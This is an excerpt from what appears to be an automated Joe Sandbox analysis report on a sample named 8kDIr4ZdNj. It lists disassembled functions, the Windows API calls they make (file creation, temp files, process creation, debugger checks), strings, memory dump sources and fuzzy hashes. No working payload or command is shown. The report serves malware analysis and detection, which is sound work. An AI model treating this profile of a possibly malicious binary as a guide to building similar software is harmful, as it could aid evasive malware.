                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                        • String ID: X
                                                                        • API String ID: 3777226403-3081909835
                                                                        • Opcode ID: 72d35d7805d161413b31a647c159956bab71b90ff78b413d191ffc13e21153e9
                                                                        • Instruction ID: 052cf663fe7c06ffb42f17e8643336fd702a2f76968ab212f91699b4a3e002f8
                                                                        • Opcode Fuzzy Hash: 72d35d7805d161413b31a647c159956bab71b90ff78b413d191ffc13e21153e9
                                                                        • Instruction Fuzzy Hash: 6521A430A142589BCF11AFD8C845BDE7BF8FF49714F044019E408E7241DBB45949CF92
                                                                        Function 008F8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock_memmove
                                                                        • String ID: EA06
                                                                        • API String ID: 1988441806-3962188686
                                                                        • Opcode ID: 876b33fff3a5085316edbf694f3449e5e5506e0624a76bed08572af255879854
                                                                        • Instruction ID: 187e12c92e3d6f871f610639f2e71e6daa326ba092c30b75cab5a61bd78dd8a3
                                                                        • Opcode Fuzzy Hash: 876b33fff3a5085316edbf694f3449e5e5506e0624a76bed08572af255879854
                                                                        • Instruction Fuzzy Hash: E601B971D0421C7EDB28DAA8CC56EFE7BF8DF15311F00459AF552D6281E975E6048B60
                                                                        Function 014FFA08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 014FFA4D
                                                                        • ExitProcess.KERNEL32(00000000), ref: 014FFA6C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CreateExit
                                                                        • String ID: D
                                                                        • API String ID: 126409537-2746444292
                                                                        • Opcode ID: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                                                                        • Instruction ID: b237198fcaf73db815df176e0540346a4c5af254930d83dc214299ae3a3a960e
                                                                        • Opcode Fuzzy Hash: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                                                                        • Instruction Fuzzy Hash: 34F0EC7294024DABDB60EFE0CC49FEE777CBF44701F448509FB1A9A284DA7496088B61
                                                                        Function 008F98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 008F98F8
                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008F990F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Temp$FileNamePath
                                                                        • String ID: aut
                                                                        • API String ID: 3285503233-3010740371
                                                                        • Opcode ID: 0eae07640cfb7637dae6b6f211b1e9f83315bce419137c1878c0398ea56cc5a5
                                                                        • Instruction ID: 9d04234e237baf338ab5c036abb60326a3213fad92b368369be6b31d30cdb9e9
                                                                        • Opcode Fuzzy Hash: 0eae07640cfb7637dae6b6f211b1e9f83315bce419137c1878c0398ea56cc5a5
                                                                        • Instruction Fuzzy Hash: 02D05E7964430DABDB50DBA0DC0EFDA777CE704704F0046B1BA64921A1EAB09598DB91
                                                                        Function 0090CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5d6e93e58661ed844a951b19faf7531256c6597fcae50ff2fa38645e64bbcdcd
                                                                        • Instruction ID: 52070e1234653c0376a58dec588c86d2fc61445c6efcda01e94a9884bb9f82f6
                                                                        • Opcode Fuzzy Hash: 5d6e93e58661ed844a951b19faf7531256c6597fcae50ff2fa38645e64bbcdcd
                                                                        • Instruction Fuzzy Hash: FBF138B16083059FCB14DF28C480A6ABBE5FF89314F54892EF9999B391D730E945CF82
                                                                        Function 0089F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008B0193
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 008B019B
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008B01A6
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008B01B1
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 008B01B9
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 008B01C1
                                                                          • Part of subcall function 008A60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0089F930), ref: 008A6154
                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0089F9CD
                                                                        • OleInitialize.OLE32(00000000), ref: 0089FA4A
                                                                        • CloseHandle.KERNEL32(00000000), ref: 008D45C8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                        • String ID:
                                                                        • API String ID: 1986988660-0
                                                                        • Opcode ID: ae9541c9a2dd833dfe78e3973160cda63e0c7c6b22079f36a776231d82f327a5
                                                                        • Instruction ID: 43b1f11f4612261e1d2b0249f0a862b9c447e2992d1a639224ace4ddaafe66d3
                                                                        • Opcode Fuzzy Hash: ae9541c9a2dd833dfe78e3973160cda63e0c7c6b22079f36a776231d82f327a5
                                                                        • Instruction Fuzzy Hash: 6281ACB0939B40CFC794EF2BA8606297BE5FB98307756812AE419CB273E7705485EF11
                                                                        Function 008B4761 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __flush__write_memmove
                                                                        • String ID:
                                                                        • API String ID: 1671952623-0
                                                                        • Opcode ID: 7daaa5fb134a0f107b23d303f52d9efec4bb6e2f4a99a956fa65b4d1c1be2b21
                                                                        • Instruction ID: 67247a719c2a37b4dc850d1de2da096eabf94bc40bdce8266c816ef584939047
                                                                        • Opcode Fuzzy Hash: 7daaa5fb134a0f107b23d303f52d9efec4bb6e2f4a99a956fa65b4d1c1be2b21
                                                                        • Instruction Fuzzy Hash: F2218374B0060E9BDB188E69C8824EE77B6FF41354B24D57DE859C6742EB30DD41CA45
                                                                        Function 0089434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00894370
                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00894415
                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00894432
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_$_memset
                                                                        • String ID:
                                                                        • API String ID: 1505330794-0
                                                                        • Opcode ID: a641c894db63b7b063babd7583e1991329d5fca922972f3227673e33bdc395d8
                                                                        • Instruction ID: daee0dfcbb51eea4fda3f40d342e9e9d4bd10f55bdeb49f8e2651ea39f95aaad
                                                                        • Opcode Fuzzy Hash: a641c894db63b7b063babd7583e1991329d5fca922972f3227673e33bdc395d8
                                                                        • Instruction Fuzzy Hash: A831C3705197019FDB20EF34D884A9BBBF8FB48309F04092EE69AC2351D771A945DB52
                                                                        Function 008B571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __FF_MSGBANNER.LIBCMT ref: 008B5733
                                                                          • Part of subcall function 008BA16B: __NMSG_WRITE.LIBCMT ref: 008BA192
                                                                          • Part of subcall function 008BA16B: __NMSG_WRITE.LIBCMT ref: 008BA19C
                                                                        • __NMSG_WRITE.LIBCMT ref: 008B573A
                                                                          • Part of subcall function 008BA1C8: GetModuleFileNameW.KERNEL32(00000000,009533BA,00000104,?,00000001,00000000), ref: 008BA25A
                                                                          • Part of subcall function 008BA1C8: ___crtMessageBoxW.LIBCMT ref: 008BA308
                                                                          • Part of subcall function 008B309F: ___crtCorExitProcess.LIBCMT ref: 008B30A5
                                                                          • Part of subcall function 008B309F: ExitProcess.KERNEL32 ref: 008B30AE
                                                                          • Part of subcall function 008B8B28: __getptd_noexit.LIBCMT ref: 008B8B28
                                                                        • RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,00000000,?,?,?,008B0DD3,?), ref: 008B575F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 1372826849-0
                                                                        • Opcode ID: 965cf6abd1d68fbe1bd21e0fb85090e981855db307a6b81e43600d03efda1f79
                                                                        • Instruction ID: 0163f0ba77d4e8d54fcccf80ab864dc57c6cac67af3620c1b1cc97a14c005901
                                                                        • Opcode Fuzzy Hash: 965cf6abd1d68fbe1bd21e0fb85090e981855db307a6b81e43600d03efda1f79
                                                                        • Instruction Fuzzy Hash: 7C01F135304B05EAD6112B7DEC82BEE778CFF82362F500525F505DA382DEB09C00976A
                                                                        Function 008F98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008F9548,?,?,?,?,?,00000004), ref: 008F98BB
                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008F9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008F98D1
                                                                        • CloseHandle.KERNEL32(00000000,?,008F9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008F98D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleTime
                                                                        • String ID:
                                                                        • API String ID: 3397143404-0
                                                                        • Opcode ID: e324cbcec56ff1bdcde66ba4540efac1fc259cff59ae32e0297c2e7c6ead6a1e
                                                                        • Instruction ID: 7a0b00653f53a2ed8cb08dff61db865931086492c96bc45c1661539bfb59185b
                                                                        • Opcode Fuzzy Hash: e324cbcec56ff1bdcde66ba4540efac1fc259cff59ae32e0297c2e7c6ead6a1e
                                                                        • Instruction Fuzzy Hash: E8E0863229461CB7E7211B64EC09FDA7B19EB067A0F108220FB64A90E0C7B12511E798
                                                                        Function 008F8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 008F8D1B
                                                                          • Part of subcall function 008B2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,008B9A24), ref: 008B2D69
                                                                          • Part of subcall function 008B2D55: GetLastError.KERNEL32(00000000,?,008B9A24), ref: 008B2D7B
                                                                        • _free.LIBCMT ref: 008F8D2C
                                                                        • _free.LIBCMT ref: 008F8D3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                        • Instruction ID: 7750af1a74db30a00b3798966172c70be7405e98a904161c45f0289477050d88
                                                                        • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                        • Instruction Fuzzy Hash: 59E012A161260986DB24B57CA940AE713DCEF58352718091DB50DD7286CE64F8428134
                                                                        Function 0089A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CALL
                                                                        • API String ID: 0-4196123274
                                                                        • Opcode ID: f1eebd6b2be8d21658c322eb2100aee69ea79ea0ee44657e828feabd4c3653af
                                                                        • Instruction ID: 1bf07c9f37d7ba5d443126598b257a5ccac1e5adc4fefc909c8acd5c83bfdaa1
                                                                        • Opcode Fuzzy Hash: f1eebd6b2be8d21658c322eb2100aee69ea79ea0ee44657e828feabd4c3653af
                                                                        • Instruction Fuzzy Hash: D5224A70508205DFDB28EF18C490A6AB7E1FF85314F19896DE98ADB362D731EC45CB82
                                                                        Function 00894C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: EA06
                                                                        • API String ID: 4104443479-3962188686
                                                                        • Opcode ID: 68bd21922a639b3671ceb079bd9df6cb55b5a9c0c84a6ceb0b153bf9051b1c27
                                                                        • Instruction ID: 6bb1205392ff21a5354bffa8529057e3a3d3032b0c1af6a1ad5e6a83aaa7f110
                                                                        • Opcode Fuzzy Hash: 68bd21922a639b3671ceb079bd9df6cb55b5a9c0c84a6ceb0b153bf9051b1c27
                                                                        • Instruction Fuzzy Hash: C4416B25A0425C5BDF25BB688C51FBE7BA2FB45304F2C6574FC82DB282D6349D4683A2
                                                                        Function 008947D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsThemeActive.UXTHEME ref: 00894834
                                                                          • Part of subcall function 008B336C: __lock.LIBCMT ref: 008B3372
                                                                          • Part of subcall function 008B336C: DecodePointer.KERNEL32(00000001,?,00894849,008E7C74), ref: 008B337E
                                                                          • Part of subcall function 008B336C: EncodePointer.KERNEL32(?,?,00894849,008E7C74), ref: 008B3389
                                                                          • Part of subcall function 008948FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00894915
                                                                          • Part of subcall function 008948FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0089492A
                                                                          • Part of subcall function 00893B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00893B68
                                                                          • Part of subcall function 00893B3A: IsDebuggerPresent.KERNEL32(?,?), ref: 00893B7A
                                                                          • Part of subcall function 00893B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009552F8,009552E0,?,?), ref: 00893BEB
                                                                          • Part of subcall function 00893B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00893C6F
                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00894874
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                        • String ID:
                                                                        • API String ID: 1438897964-0
                                                                        • Opcode ID: 81c29779fe29fdc1d5abb876fb25c7c1b006b0b19596ecd12cf349ca9e16fd38
                                                                        • Instruction ID: 438ecda5971604d1d0f2138ef2b251a5f39648d9a2882c9e61f06e2753b1405c
                                                                        • Opcode Fuzzy Hash: 81c29779fe29fdc1d5abb876fb25c7c1b006b0b19596ecd12cf349ca9e16fd38
                                                                        • Instruction Fuzzy Hash: 43119D719283459BCB00EF2AEC0594EBBE8FF89750F14452EF494D32B2DB709645DB92
                                                                        Function 00895C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00895821,?,?,?,?), ref: 00895CC7
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00895821,?,?,?,?), ref: 008CDD73
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 6ed574946b9f15b0425b969f199459fb27fc7d534383bf7ed263097f4524a36f
                                                                        • Instruction ID: 1e49ff343c0697601f0b9151ac2d59457392c9c43bdbb2894259ecba15a05ce4
                                                                        • Opcode Fuzzy Hash: 6ed574946b9f15b0425b969f199459fb27fc7d534383bf7ed263097f4524a36f
                                                                        • Instruction Fuzzy Hash: 90016D70284708BEF6212E24CC8AFA63ADCFB0176CF148319BAE59A1E0C6B45C488B54
                                                                        Function 008B0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008B571C: __FF_MSGBANNER.LIBCMT ref: 008B5733
                                                                          • Part of subcall function 008B571C: __NMSG_WRITE.LIBCMT ref: 008B573A
                                                                          • Part of subcall function 008B571C: RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,00000000,?,?,?,008B0DD3,?), ref: 008B575F
                                                                        • std::exception::exception.LIBCMT ref: 008B0DEC
                                                                        • __CxxThrowException@8.LIBCMT ref: 008B0E01
                                                                          • Part of subcall function 008B859B: RaiseException.KERNEL32(?,?,?,00949E78,00000000,?,?,?,?,008B0E06,?,00949E78,?,00000001), ref: 008B85F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 3902256705-0
                                                                        • Opcode ID: 0721ae83babed67960135a53cdd8c657942baae484500fd6e6785e1f8b121a72
                                                                        • Instruction ID: 4406fa538590f3f52fa124ddfb50f92b0408abaf994343355a40acebb8e21299
                                                                        • Opcode Fuzzy Hash: 0721ae83babed67960135a53cdd8c657942baae484500fd6e6785e1f8b121a72
